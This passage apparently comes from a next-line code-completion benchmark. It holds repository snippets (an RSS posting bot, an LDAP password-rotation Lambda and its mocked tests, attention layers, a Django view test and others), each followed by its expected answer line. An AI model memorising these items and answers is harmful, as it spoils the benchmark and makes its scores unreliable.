hashtag_wordlist = hashtags_file.read().splitlines()
#############################################################################
##
# Load previous state, initialize new state
def load_state():
global state
global oldState
global hashtag_wordlist
try:
with open(config["files"]["state"]) as fh:
oldState = yaml.load(fh, yaml.SafeLoader)
except:
oldState = {}
for feed in feeds:
if not feed["id"] in state:
state[feed["id"]] = {}
if not feed["id"] in oldState:
oldState[feed["id"]] = {}
#############################################################################
##
# Save state for next cycle
def save_state():
with open(config["files"]["state"], 'w') as fh:
fh.write(yaml.dump(state, default_flow_style=False))
#############################################################################
##
# Load the configured feeds and preprocess text
def load_feeds():
global state
global oldState
for feed in feeds:
feedStateOld = oldState[feed["id"]]
feedState = state[feed["id"]]
if "url" in feed:
entries = feedparser.parse(feed["url"]).entries
if len(entries) < 1:
raise RuntimeError("No elements in feed " + feed["url"])
for entry in entries:
title = entry.get('title')
text = entry.get('summary')
url = entry.get('link')
category = entry.get('category')
raw_posting = ""
post_type_text = False
hashtags = []
updated = entry.get('updated')
boost_target = ""
edited = False
exists = False
oldPosting = {}
status_id = 0
posted = False
post_text = ""
boosted = False
ref = ""
if url in feedStateOld:
exists = True
oldPosting = feedStateOld[url]
if "status_id" in oldPosting:
status_id = oldPosting["status_id"]
if "posted" in oldPosting:
posted = oldPosting["posted"]
if "boosted" in oldPosting:
boosted = oldPosting["boosted"]
first_oewa = False
if "enable_oewa_sport" in feed and feed["enable_oewa_sport"]:
first_oewa = True
| if not category in oewa_bypass: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Vitesco-Technologies/ldap-password-rotation
# Path: src/lambda_function.py
SECRETS_MANAGER_KEY_USERNAME = (
os.environ.get("SECRETS_MANAGER_KEY_USERNAME") or "username"
)
SECRETS_MANAGER_KEY_PASSWORD = (
os.environ.get("SECRETS_MANAGER_KEY_PASSWORD") or "password"
)
SECRETS_MANAGER_KEY_DN = os.environ.get("SECRETS_MANAGER_KEY_DN") or ""
SECRETS_MANAGER_REGION = os.environ.get("SECRETS_MANAGER_REGION") or "eu-central-1"
EXCLUDE_CHARACTERS_USER = os.environ.get("EXCLUDE_CHARACTERS_USER") or "$/'\"\\"
EXCLUDE_CHARACTERS_PW = os.environ.get("EXCLUDE_CHARACTERS_PW") or "@$/`'\"\\"
EXCLUDE_CHARACTERS_NEW_PW = os.environ.get("EXCLUDE_CHARACTERS_NEW_PW") or "@$/`'\"\\"
LDAP_SERVER_LIST = (
os.environ.get("LDAP_SERVER_LIST")
or '["ldaps://ex1dcsrv1001.ex1.example.com", "ldaps://ex1dcsrv1002.ex1.example.com"]'
)
LDAP_SERVER_PORT = os.environ.get("LDAP_SERVER_PORT") or "636"
LDAP_BASE_DN = os.environ.get("LDAP_BASE_DN") or "dc=ex1,dc=example,dc=com"
LDAP_USER_AUTH_ATTRIBUTE = (
os.environ.get("LDAP_USER_AUTH_ATTRIBUTE") or "userPrincipalName"
)
LDAP_USE_SSL = True
LDAP_BIND_CURRENT_CREDS_SUCCESSFUL = "LDAP_BIND_USING_CURRENT_CREDS_SUCCESSFUL"
LDAP_BIND_PENDING_CREDS_SUCCESSFUL = "LDAP_BIND_USING_PENDING_CREDS_SUCCESSFUL"
def lambda_handler(event, context):
def create_secret(secrets_manager_client, arn, token, current_dict):
def set_secret(current_dict, pending_dict):
def test_secret(pending_dict):
def finish_secret(secrets_manager_client, arn, token):
def get_secret_dict(secrets_manager_client, arn, stage, token=None):
def execute_ldap_command(current_dict, pending_dict):
def check_inputs(dict_arg):
def get_user_dn(conn, user, base_dn=LDAP_BASE_DN):
def ldap_connection(dict_arg):
# Path: tests/utilities/lambda_util.py
def get_role_name():
def _zip_lambda(func_str):
def get_lambda_zip_file():
# Path: tests/utilities/ldap_test/server.py
class LdapServer(object):
def __init__(
self,
config=None,
java_gateway_port=DEFAULT_GATEWAY_PORT,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
java_delay=None,
):
global SERVER_PROCESS, JVM_GATEWAY
if SERVER_PROCESS is None:
SERVER_PROCESS = run_jvm_server(java_gateway_port)
# Added to introduce a delay between starting the SERVER_PROCESS and the JVM_GATEWAY if desired.
# This seems to be a problem on some MacOS systems, and without it you end up with an infinite hang.
if java_delay:
time.sleep(java_delay)
if JVM_GATEWAY is None:
JVM_GATEWAY = run_jvm_gateway(java_gateway_port, python_proxy_port)
self.server = JVM_GATEWAY.entry_point
self.config, self._config_obj = ConfigBuilder(JVM_GATEWAY).build_from(config)
self.server_id = self.server.create(self._config_obj)
def start(self):
self.server.start(self.server_id)
def stop(self):
self.server.stop(self.server_id)
# Path: tests/test_lambda.py
import json
import logging
import os
import boto3
import ldap3
import mock
import pytest
from uuid import uuid4
from moto import mock_lambda, mock_secretsmanager
from src import lambda_function
from .utilities import lambda_util
from .utilities.ldap_test import LdapServer
# Copyright 2023 Daniel Dias, Vitesco Technologies
#
# SPDX-License-Identifier: Apache-2.0
_region = "eu-central-1"
# server is defined as global to allow us to update it when we mock
# ldap3.extend.microsoft.modifyPassword.ad_modify_password with mock_ad_modify_password
_server = LdapServer()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
############
# fixtures #
############
@pytest.fixture(scope="function", autouse=True)
def aws_credentials():
"""Mocked AWS Credentials for moto."""
os.environ["AWS_ACCESS_KEY_ID"] = "testing"
os.environ["AWS_SECRET_ACCESS_KEY"] = "testing"
os.environ["AWS_SECURITY_TOKEN"] = "testing"
os.environ["AWS_SESSION_TOKEN"] = "testing"
os.environ["AWS_DEFAULT_REGION"] = _region
@pytest.fixture(scope="function", autouse=True)
def lambda_env():
| lambda_function.SECRETS_MANAGER_KEY_USERNAME = "bind_dn" |
====REPOSITORY====
# Repo Name: totallynotadi/vibrant-python
# Path: vibrant/generator.py
def generate(swatches: List[Swatch]) -> Palette:
max_population = find_max_population(swatches)
palette: Palette = generate_variation_colors(
swatches, max_population, generator_opts
)
generate_empty_swatches(palette, generator_opts)
return palette
# Path: vibrant/image.py
class VibrantImage:
def __init__(
self,
src: Union[
bytes,
str,
io.BytesIO,
io.BufferedReader,
PILImage,
"VibrantImage",
],
props: Optional[Props] = Props(),
) -> None:
self.image: Image = None
self.props: Props = props
if isinstance(src, str):
if src.startswith("http"):
src = requests.get(src).content
if not os.path.exists(src):
raise FileNotFoundError("Image doesn't exist at given path - %s." % src)
if isinstance(src, bytes):
src = io.BytesIO(src)
if isinstance(src, PILImage):
self.image = src
else:
self.image = Image.open(src)
@classmethod
def from_url(cls, src: str) -> "VibrantImage":
src = requests.get(src).content
src = io.BytesIO(src)
return cls(Image.open(src))
@classmethod
def from_path(cls, src: str) -> "VibrantImage":
if os.path.exists(src):
return cls(Image.open(src))
raise FileNotFoundError("Image doesn't exist at given path - %s." % src)
@classmethod
def from_bytes(cls, src: bytes) -> "VibrantImage":
src = io.BytesIO(src)
return cls(Image.open(src))
@classmethod
def from_fp(cls, fp: io.BufferedReader) -> "VibrantImage":
return cls(Image.open(fp))
def scale_down(self):
...
def _swatch_filter(self, swatch: List[int]) -> bool:
r, g, b = swatch.rgb
return not (r > 250 and g > 250 and b > 250)
def _parse_swatches(
self,
raw_swatches: List,
swatch_populations: List[Tuple[int, int]],
) -> List[Swatch]:
swatches = []
curr_idx = 0
for idx in range(0, len(raw_swatches), 3):
if idx + 2 <= (len(raw_swatches) - 1):
swatches.append(
Swatch(
rgb=[
raw_swatches[idx],
raw_swatches[idx + 1],
raw_swatches[idx + 2],
],
population=swatch_populations[curr_idx][0],
)
)
curr_idx += 1
return swatches
def quantize(self) -> List[Swatch]:
self.image = self.image.quantize(self.props.color_count)
raw_swatches = self.image.getpalette()
raw_swatches = list(filter(lambda x: x != 0, raw_swatches))
swatch_populations = self.image.getcolors(self.props.color_count)
swatches = self._parse_swatches(
raw_swatches=raw_swatches,
swatch_populations=swatch_populations,
)
return swatches
# Path: vibrant/models.py
class Palette:
vibrant: Swatch = None
dark_vibrant: Swatch = None
light_vibrant: Swatch = None
muted: Swatch = None
dark_muted: Swatch = None
light_muted: Swatch = None
# Path: vibrant/models.py
class Props:
color_count: int = 64
quality: int = 5
# Path: vibrant/main.py
import io
from typing import Union
from PIL.Image import Image as PILImage
from vibrant.generator import generate
from vibrant.image import VibrantImage
from vibrant.models import Palette, Props
class Vibrant:
props: Props
def __init__(self, color_count=64, quality=5) -> None:
self.props = Props(color_count=color_count, quality=quality)
def get_palette(
self,
src: Union[
bytes,
str,
io.BytesIO,
io.BufferedReader,
PILImage,
| VibrantImage, |
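The _parse_swatches method in this record rebuilds RGB triples from the flat list that PIL's getpalette() returns. A minimal sketch of that regrouping, with made-up palette values:

# Regrouping a flat palette into RGB triples, as _parse_swatches does above.
# The palette values here are made up for illustration.
flat_palette = [255, 0, 0, 0, 255, 0, 0, 0, 255]  # red, green, blue

rgb_triples = [flat_palette[i:i + 3] for i in range(0, len(flat_palette), 3)]
assert rgb_triples == [[255, 0, 0], [0, 255, 0], [0, 0, 255]]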
====REPOSITORY====
# Repo Name: MAGICS-LAB/SparseModernHopfield
# Path: utils/sparse_max.py
class Sparsemax(nn.Module):
__constants__ = ["dim"]
def __init__(self, dim=-1):
"""
Sparsemax class as seen in https://arxiv.org/pdf/1602.02068.pdf
Parameters
----------
dim: The dimension along which to apply sparsemax. Default: -1
"""
super(Sparsemax, self).__init__()
self.dim = dim
def __setstate__(self, state):
self.__dict__.update(state)
if not hasattr(self, "dim"):
self.dim = None
def forward(self, input):
a = SparsemaxFunction.apply(input, self.dim)
return a
def extra_repr(self):
return f"dim={self.dim}"
# Path: utils/entmax.py
class Entmax15(nn.Module):
def __init__(self, dim=-1, k=None):
"""1.5-entmax: normalizing sparse transform (a la softmax).
Solves the optimization problem:
max_p <x, p> - H_1.5(p) s.t. p >= 0, sum(p) == 1.
where H_1.5(p) is the Tsallis alpha-entropy with alpha=1.5.
Parameters
----------
dim : int
The dimension along which to apply 1.5-entmax.
k : int or None
number of largest elements to partial-sort over. For optimal
performance, should be slightly bigger than the expected number of
nonzeros in the solution. If the solution is more than k-sparse,
this function is recursively called with a 2*k schedule.
If `None`, full sorting is performed from the beginning.
"""
self.dim = dim
self.k = k
super(Entmax15, self).__init__()
def forward(self, X):
return entmax15(X, dim=self.dim, k=self.k)
# Path: utils/general_entmax.py
class EntmaxAlpha(nn.Module):
def __init__(self, head_count=4, dim=-1):
super(EntmaxAlpha, self).__init__()
self.dim = dim
# self.alpha_chooser = nn.Parameter(AlphaChooser(1)())
self.alpha = nn.Parameter(torch.randn(head_count))
def forward(self, att_scores):
batch_size, head_count, query_len, key_len = att_scores.size()
expanded_alpha = (
self.alpha.unsqueeze(0).unsqueeze(-1).unsqueeze(-1)
) # [1,nb_heads,1,1]
# expanded_alpha = expanded_alpha.repeat(1, head_count, 1, 1)
expanded_alpha = expanded_alpha.expand(
(batch_size, -1, query_len, 1)
) # [bs, nb_heads, query_len,1]
# expanded_alpha += 1
expanded_alpha = 1 + torch.sigmoid(expanded_alpha)
# torch.clamp(1+expanded_alpha, min=1.0, max=4.0)
p_star = entmax_bisect(att_scores, expanded_alpha)
return p_star
# Path: layers.py
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import math
from einops import rearrange, repeat
from math import sqrt
from utils.sparse_max import Sparsemax
from utils.entmax import Entmax15
from utils.general_entmax import EntmaxAlpha
class FullAttention(nn.Module):
'''
The Attention operation
'''
def __init__(self, scale=None, attention_dropout=0.0):
super(FullAttention, self).__init__()
self.scale = scale
self.dropout = nn.Dropout(attention_dropout)
def forward(self, queries, keys, values, mask=None):
B, L, H, E = queries.shape
_, S, _, D = values.shape
scale = self.scale or 1. / sqrt(E)
scores = torch.einsum("blhe,bshe->bhls", queries, keys)
if mask is not None:
mask = mask.unsqueeze(1).unsqueeze(1).repeat(1, H, scores.size(-2), 1)
scores = scores.masked_fill_(mask, float('-inf'))
A = self.dropout(torch.softmax(scale * scores, dim=-1))
V = torch.einsum("bhls,bshd->blhd", A, values)
return V.contiguous()
class AttentionLayer(nn.Module):
'''
The Multi-head Self-Attention (MSA) Layer
'''
def __init__(
self,
d_model,
n_heads,
d_keys=None,
d_values=None,
mix=True,
dropout=0.1,
scale=None):
super(AttentionLayer, self).__init__()
d_keys = d_keys or (d_model // n_heads)
d_values = d_values or (d_model // n_heads)
self.d_model = d_model
self.inner_attention = FullAttention(
scale=scale, attention_dropout=dropout)
self.query_projection = nn.Linear(d_model, d_keys * n_heads)
self.key_projection = nn.Linear(d_model, d_keys * n_heads)
self.value_projection = nn.Linear(d_model, d_values * n_heads)
self.out_projection = nn.Linear(d_values * n_heads, d_model)
self.n_heads = n_heads
self.mix = mix
def forward(self, inputs):
queries = inputs
keys = inputs
values = inputs
B, L, _ = queries.shape
_, S, _ = keys.shape
H = self.n_heads
queries = self.query_projection(queries).view(B, L, H, -1)
keys = self.key_projection(keys).view(B, S, H, -1)
values = self.value_projection(values).view(B, S, H, -1)
out = self.inner_attention(
queries,
keys,
values,
)
out = out.view(B, L, -1)
out = out.mean(1)
return self.out_projection(out)
class HopfieldCore(nn.Module):
'''
The Hopfield operation
'''
def __init__(self, scale=None, attention_dropout=0.0, mode='sparsemax', norm=False):
super(HopfieldCore, self).__init__()
self.scale = scale
self.norm = norm
self.dropout = nn.Dropout(attention_dropout)
if mode == 'sparsemax':
self.softmax = Sparsemax(dim=-1)
elif mode == 'entmax':
| self.softmax = Entmax15(dim=-1) |
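The Sparsemax docstring above cites Martins & Astudillo (2016); what the forward pass ultimately computes is the Euclidean projection of the scores onto the probability simplex. A minimal NumPy sketch of the 1-D projection (a reference calculation under that definition, not the autograd-aware SparsemaxFunction the module delegates to):

import numpy as np

def sparsemax_1d(z: np.ndarray) -> np.ndarray:
    """Euclidean projection of z onto the probability simplex."""
    z_sorted = np.sort(z)[::-1]              # scores in descending order
    cumsum = np.cumsum(z_sorted)
    k = np.arange(1, len(z) + 1)
    support = k * z_sorted > cumsum - 1      # 1 + k * z_(k) > sum_{j<=k} z_(j)
    k_z = k[support][-1]                     # support size
    tau = (cumsum[support][-1] - 1) / k_z    # threshold
    return np.maximum(z - tau, 0.0)

p = sparsemax_1d(np.array([2.0, 1.0, -1.0]))
assert abs(p.sum() - 1.0) < 1e-12            # sums to one; zeros are exact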
====REPOSITORY====
# Repo Name: Kuba314/arcparse
# Path: arcparse/errors.py
class InvalidArgument(InvalidParser):
pass
# Path: arcparse/errors.py
class InvalidTypehint(InvalidArgument):
pass
# Path: arcparse/errors.py
class MissingConverter(InvalidArgument):
pass
# Path: arcparse/_typehints.py
def extract_collection_type(typehint: type) -> type | None:
origin = get_origin(typehint)
if origin == list:
return get_args(typehint)[0]
return None
# Path: arcparse/_typehints.py
def extract_literal_strings(typehint: type) -> list[str] | None:
origin = get_origin(typehint)
if origin != Literal:
return None
args = get_args(typehint)
if not all(isinstance(arg, str) for arg in args):
return None
return list(args)
# Path: arcparse/_typehints.py
def extract_optional_type(typehint: type) -> type | None:
origin = get_origin(typehint)
if origin == Optional:
return get_args(typehint)[0]
elif origin in {Union, UnionType}:
args = get_args(typehint)
if len(args) == 2:
if args[0] == NoneType:
return args[1]
elif args[1] == NoneType:
return args[0]
return None
# Path: arcparse/_typehints.py
def extract_type_from_typehint(typehint: type) -> type:
if optional_type := extract_optional_type(typehint):
return optional_type
elif collection_type := extract_collection_type(typehint):
return collection_type
return typehint
# Path: arcparse/arguments.py
class Void:
class ContainerApplicable(Protocol):
class BaseArgument(ABC, ContainerApplicable):
class Flag(BaseArgument):
class NoFlag(BaseArgument):
class TriFlag(ContainerApplicable):
class BaseValueArgument[T](BaseArgument):
class Positional[T](BaseValueArgument[T]):
class Option[T](BaseValueArgument[T]):
class MxGroup:
class Subparsers:
def apply(self, actions_container: _ActionsContainer, name: str) -> Action:
def apply(self, actions_container: _ActionsContainer, name: str) -> Action:
def get_argparse_args(self, name: str) -> list[str]:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
def get_argparse_args(self, name: str) -> list[str]:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
def get_argparse_args(self, name: str) -> list[str]:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
def apply(self, actions_container: _ActionsContainer, name: str) -> None:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
def get_argparse_args(self, name: str) -> list[str]:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
def get_argparse_args(self, name: str) -> list[str]:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
# Path: arcparse/converters.py
class itemwise[T]:
"""Mark converter as itemwise
This changes its return-type signature to wrap T in list. This is used in
argument converter declaration. Argument converters returning T make the
argument also return T. However if an itemwise conversion is desired on
arguments accepting multiple values (nargs="*"), the return type should
always be wrapped in a list.
"""
def __init__(self, converter: Callable[[str], T]) -> None:
self._converter = converter
def __call__(self, string: str) -> list[T]:
return self._converter(string) # type: ignore
def __repr__(self) -> str:
return f"itemwise({self._converter})"
# Path: arcparse/_partial_arguments.py
from abc import ABC, abstractmethod
from collections.abc import Callable, Collection
from dataclasses import dataclass
from typing import Any, Literal, get_origin
from arcparse.errors import InvalidArgument, InvalidTypehint, MissingConverter
from ._typehints import (
extract_collection_type,
extract_literal_strings,
extract_optional_type,
extract_type_from_typehint,
)
from .arguments import (
BaseValueArgument,
ContainerApplicable,
Flag,
NoFlag,
Option,
Positional,
TriFlag,
Void,
void,
)
from .converters import itemwise
import re
@dataclass(kw_only=True, eq=False)
class PartialMxGroup:
required: bool = False
@dataclass(kw_only=True)
| class BasePartialArgument[R: ContainerApplicable](ABC): |
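The _typehints helpers in this record are thin wrappers over typing.get_origin/get_args; a quick demonstration of the introspection results they branch on:

# The introspection results that extract_collection_type,
# extract_optional_type and extract_literal_strings branch on above.
from typing import Literal, Optional, get_args, get_origin

assert get_origin(list[int]) is list and get_args(list[int]) == (int,)
assert get_args(Optional[str]) == (str, type(None))   # Optional is a Union
assert get_origin(Literal["a", "b"]) is Literal
assert get_args(Literal["a", "b"]) == ("a", "b")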
====REPOSITORY====
# Repo Name: rohitsinghlab/sceodesic
# Path: sceodesic/utils/fn_timer.py
def fn_timer(func):
@wraps(func)
def wrapper(*args, **kwargs):
# run and time function
start_time = time.time()
result = func(*args, **kwargs)
end_time = time.time()
elapsed_time = end_time - start_time
print(f"{func.__name__} took {elapsed_time:.3f} seconds to run.")
return result
return wrapper
# Path: sceodesic/helper/compute_covariance.py
def compute_covariance_and_ncomps_pct_variance(data, max_condition_number, pvd_pct):
""" Computes a symmetric positive definite sample covariance matrix.
- `data` is a cell x gene 2D numpy array.
"""
# Compute raw covariance.
matrix = np.cov(data, rowvar=False)
S,U = np.linalg.eigh(matrix)
ncomps_pct_variance = np.argmax(np.cumsum(S[::-1]) / np.sum(S) >= pvd_pct) + 1
# normalize by condition-volume
matrix = _normalize_condition_volume(S, U, max_condition_number, log=False)
return matrix, ncomps_pct_variance
# Path: sceodesic/sceo_main/estimate_covariances.py
import scipy
import pickle
import sys
from ..utils import fn_timer
from ..helper import compute_covariance_and_ncomps_pct_variance
from .default_keys import *
# package-specific modules
@fn_timer
def estimate_covariances(adata, max_condition_number, pvd_pct=0.9,
copy=False, return_results=False,
top_genes=None, cohort_assn=None,
uns_key=None):
if uns_key is None:
uns_key = UNS_KEY
# not able to be passed in
hvg_key = HVG_KEY
# top_genes can either be passed in anew or be precomputed using get_locally_variable_genes
if top_genes is None:
try:
top_genes = adata.uns[uns_key][hvg_key]
except Exception as e:
message = ("Error: must either specify a set of genes to consider or "
"have run sceodesic.get_locally_variable_genes beforehand.")
print(message, file=sys.stderr)
raise e
else:
adata.uns[uns_key][hvg_key] = top_genes
# can either pass in a cell cohort assignment (array cohort_assn with cell[i] having cluster assn cohort_assn[i])
# or the cluster_key
clustering_results = None
if cohort_assn is None:
try:
clustering_results = adata.uns[uns_key]
except Exception as e:  # bind the exception; the bare except left `e` undefined below
message = ("Error: must either specify a cell cohort assignment or "
"have run sceodesic.get_cell_cohorts beforehand.")
print(message, file=sys.stderr)
raise e
else:
c2c = {}
for i, c in enumerate(cohort_assn):
c2c[c] = c2c.get(c, []) + [i]
clustering_results = {'cell2cluster': c2c, 'stratify_cols': '***NOT SPECIFIED***'}
adata.uns[uns_key].update(clustering_results)
return _estimate_covariances(adata, max_condition_number, pvd_pct,
copy, return_results,
top_genes=top_genes,
results_clustering=clustering_results,
uns_key=uns_key)
def _estimate_covariances(adata, max_condition_number, pvd_pct=0.9,
copy=False, return_results=False, coexpression_filename=None,
top_genes=None, results_clustering=None,
uns_key=None, cluster_covar_key=None,
cluster_var_ct_key=None):
if uns_key is None:
uns_key = UNS_KEY
if cluster_covar_key is None:
cluster_covar_key = CLUSTER_COVAR_KEY
if cluster_var_ct_key is None:
cluster_var_ct_key = CLUSTER_VAR_CT_KEY
if copy:
adata = adata.copy()
# change later
top_genes = top_genes
results_clustering = results_clustering
cell2cluster = results_clustering["cell2cluster"]
filtered_data = adata[:,top_genes]
# Get the clusters from the reduced data.
clusters = {}
processed_data = None
if scipy.sparse.issparse(filtered_data.X):
processed_data = filtered_data.X.A
else:
processed_data = filtered_data.X
for key in cell2cluster.keys():
cluster_indices = cell2cluster[key]
clusters[key] = processed_data[cluster_indices,:]
cluster_covariances = {}
cluster_var_count = {}
for i,cluster in clusters.items():
| cluster_covar, var_count = compute_covariance_and_ncomps_pct_variance(cluster, max_condition_number, pvd_pct) |
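compute_covariance_and_ncomps_pct_variance above counts how many principal components are needed to reach pvd_pct of the total variance via an eigendecomposition. The same bookkeeping, shown on synthetic data:

import numpy as np

rng = np.random.default_rng(0)
data = rng.normal(size=(200, 10))            # cells x genes, synthetic

cov = np.cov(data, rowvar=False)
eigvals = np.linalg.eigh(cov)[0]             # ascending eigenvalues
explained = np.cumsum(eigvals[::-1]) / eigvals.sum()
ncomps = np.argmax(explained >= 0.9) + 1     # components covering 90% variance
print(f"{ncomps} components explain >= 90% of the variance")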
====REPOSITORY====
# Repo Name: dacx/fcd-community
# Path: fcd_community/users/forms.py
class UserAdminChangeForm(admin_forms.UserChangeForm):
class Meta(admin_forms.UserChangeForm.Meta):
model = User
field_classes = {"email": EmailField}
# Path: fcd_community/users/models.py
class User(AbstractUser):
"""
Default custom user model for Full Cycle Dev Community Product.
If adding fields that need to be filled at user signup,
check forms.SignupForm and forms.SocialSignupForms accordingly.
"""
# First and last name do not cover name patterns around the globe
name = CharField(_("Name of User"), blank=True, max_length=255)
first_name = None # type: ignore
last_name = None # type: ignore
email = EmailField(_("email address"), unique=True)
username = None # type: ignore
stripe_customer_id = CharField(max_length=255, blank=True, null=True)
USERNAME_FIELD = "email"
REQUIRED_FIELDS = []
objects = UserManager()
def get_absolute_url(self) -> str:
"""Get URL for user's detail view.
Returns:
str: URL for user detail.
"""
return reverse("users:detail", kwargs={"pk": self.id})
# Path: fcd_community/users/tests/factories.py
class UserFactory(DjangoModelFactory):
email = Faker("email")
name = Faker("name")
@post_generation
def password(self, create: bool, extracted: Sequence[Any], **kwargs):
password = (
extracted
if extracted
else Faker(
"password",
length=42,
special_chars=True,
digits=True,
upper_case=True,
lower_case=True,
).evaluate(None, None, extra={"locale": None})
)
self.set_password(password)
@classmethod
def _after_postgeneration(cls, instance, create, results=None):
"""Save again the instance if creating and at least one hook ran."""
if create and results and not cls._meta.skip_postgeneration_save:
# Some post-generation hooks ran, and may have modified us.
instance.save()
class Meta:
model = get_user_model()
django_get_or_create = ["email"]
# Path: fcd_community/users/views.py
class UserDetailView(LoginRequiredMixin, DetailView):
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
class UserRedirectView(LoginRequiredMixin, RedirectView):
def get_success_url(self):
def get_object(self):
def get_redirect_url(self):
# Path: fcd_community/users/tests/test_views.py
import pytest
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.models import AnonymousUser
from django.contrib.messages.middleware import MessageMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.http import HttpRequest, HttpResponseRedirect
from django.test import RequestFactory
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from fcd_community.users.forms import UserAdminChangeForm
from fcd_community.users.models import User
from fcd_community.users.tests.factories import UserFactory
from fcd_community.users.views import (
UserRedirectView,
UserUpdateView,
user_detail_view,
)
pytestmark = pytest.mark.django_db
class TestUserUpdateView:
"""
TODO:
extracting view initialization code as class-scoped fixture
would be great if only pytest-django supported non-function-scoped
fixture db access -- this is a work-in-progress for now:
https://github.com/pytest-dev/pytest-django/pull/258
"""
def dummy_get_response(self, request: HttpRequest):
return None
def test_get_success_url(self, user: User, rf: RequestFactory):
| view = UserUpdateView() |
====REPOSITORY====
# Repo Name: fepegar/jvol
# Path: src/jvol/io.py
def open_jvol(path: Path) -> Tuple[np.ndarray, np.ndarray]:
loaded = np.load(path)
ijk_to_ras = fill_ijk_to_ras(loaded[FormatKeys.IJK_TO_RAS.value])
quantization_block = loaded[FormatKeys.QUANTIZATION_BLOCK.value]
array = decode_array(
dc_rle_values=loaded[FormatKeys.DC_RLE_VALUES],
dc_rle_counts=loaded[FormatKeys.DC_RLE_COUNTS],
ac_rle_values=loaded[FormatKeys.AC_RLE_VALUES],
ac_rle_counts=loaded[FormatKeys.AC_RLE_COUNTS],
quantization_block=quantization_block,
target_shape=loaded[FormatKeys.SHAPE],
intercept=loaded[FormatKeys.INTERCEPT],
slope=loaded[FormatKeys.SLOPE],
dtype=loaded[FormatKeys.DTYPE].dtype,
)
return array, ijk_to_ras
# Path: src/jvol/io.py
def save_jvol(
array: np.ndarray,
ijk_to_ras: np.ndarray,
path: Path,
block_size: int = 4,
quality: int = 60,
) -> None:
block_shape = block_size, block_size, block_size
quantization_table = get_quantization_table(block_shape, quality)
dtype = array.dtype
intercept = array.min()
slope = array.max() - intercept
dc_rle_values, dc_rle_counts, ac_rle_values, ac_rle_counts = encode_array(
array,
quantization_table,
)
dc_rle_values = dc_rle_values.astype(np.min_scalar_type(dc_rle_values))
dc_rle_counts = dc_rle_counts.astype(np.min_scalar_type(dc_rle_counts))
ac_rle_values = ac_rle_values.astype(np.min_scalar_type(ac_rle_values))
ac_rle_counts = ac_rle_counts.astype(np.min_scalar_type(ac_rle_counts))
save_dict = {
FormatKeys.IJK_TO_RAS.value: ijk_to_ras[:3],
FormatKeys.QUANTIZATION_BLOCK.value: quantization_table,
FormatKeys.DC_RLE_VALUES.value: dc_rle_values,
FormatKeys.DC_RLE_COUNTS.value: dc_rle_counts,
FormatKeys.AC_RLE_VALUES.value: ac_rle_values,
FormatKeys.AC_RLE_COUNTS.value: ac_rle_counts,
FormatKeys.DTYPE.value: np.empty((), dtype=dtype),
FormatKeys.INTERCEPT.value: intercept,
FormatKeys.SLOPE.value: slope,
FormatKeys.SHAPE.value: np.array(array.shape, dtype=np.uint16),
}
with open(path, "wb") as f:
np.savez_compressed(f, **save_dict)
# Path: src/jvol/jvol.py
import os
import numpy as np
import numpy.typing as npt
from pathlib import Path
from typing import Any
from typing import TypeAlias
from typing import Union
from .io import open_jvol
from .io import save_jvol
from __future__ import annotations
TypePath: TypeAlias = Union[str, os.PathLike]
class JpegVolume:
"""Base class for saving and loading JPEG-encoded volumes.
Args:
array: 3D NumPy array.
ijk_to_ras: 4×4 affine transformation matrix containing the mapping
from voxel indices to RAS+ (left → right, posterior → anterior,
inferior → superior) coordinates. If not specified, the identity
matrix is used.
Tip:
To learn more about coordinates systems, check the following resources:
- [NiBabel](https://nipy.org/nibabel/)'s [Coordinate systems and affines](https://nipy.org/nibabel/coordinate_systems.html),
- [3D Slicer](https://www.slicer.org/)'s [Coordinate systems](https://slicer.readthedocs.io/en/latest/user_guide/coordinate_systems.html),
- [FSL](https://fsl.fmrib.ox.ac.uk/)'s [docs (see "Background information on NIfTI Orientation")](https://fsl.fmrib.ox.ac.uk/fsl/fslwiki/Orientation%20Explained)
""" # noqa: E501
def __init__(
self,
array: npt.ArrayLike,
ijk_to_ras: npt.ArrayLike | None = None,
):
self.array = np.array(array)
if ijk_to_ras is None:
ijk_to_ras = np.eye(4)
self.ijk_to_ras = np.array(ijk_to_ras, dtype=np.float64)
if self.array.ndim != 3:
raise ValueError(
f"Array must have 3 dimensions, got shape {self.array.shape}"
)
if self.ijk_to_ras.shape != (4, 4):
raise ValueError(
f"ijk_to_ras must have shape (4, 4), got {self.ijk_to_ras.shape}"
)
assert self.ijk_to_ras.shape == (4, 4)
@classmethod
def open(cls, path: TypePath) -> JpegVolume:
"""Open a JVol file.
Args:
path: Path to a file with `'.jvol'` extension.
"""
path = Path(path)
if not path.is_file():
raise FileNotFoundError(f'File not found: "{path}"')
if path.suffix != ".jvol":
raise ValueError(f'File must have .jvol extension, got "{path}"')
| return cls(*open_jvol(path)) |
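The JpegVolume docstring above describes ijk_to_ras as the affine mapping voxel indices to RAS+ coordinates. A small sketch of applying such an affine in homogeneous coordinates, with a made-up 1 mm isotropic geometry:

import numpy as np

# Hypothetical affine: 1 mm isotropic voxels, origin at (-90, -126, -72) mm.
ijk_to_ras = np.eye(4)
ijk_to_ras[:3, 3] = [-90, -126, -72]

ijk = np.array([10, 20, 30, 1])              # homogeneous voxel index
ras = ijk_to_ras @ ijk
print(ras[:3])                               # -> [-80. -106.  -42.]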
====REPOSITORY====
# Repo Name: iramluism/basel
# Path: basel/components/components.py
class Component(metaclass=abc.ABCMeta):
def __init__(
self,
name: str,
nodes: List[Node] = None,
instability: Optional[float] = 1,
abstraction: Optional[float] = 1,
error: Optional[float] = 1,
) -> None:
self.name = name
self.nodes = {}
self.instability = instability
self.abstraction = abstraction
self.error = error
for node in nodes or []:
self.add_node(node)
def set_error(self, error):
self.error = error
def set_instability(self, instability):
self.instability = instability
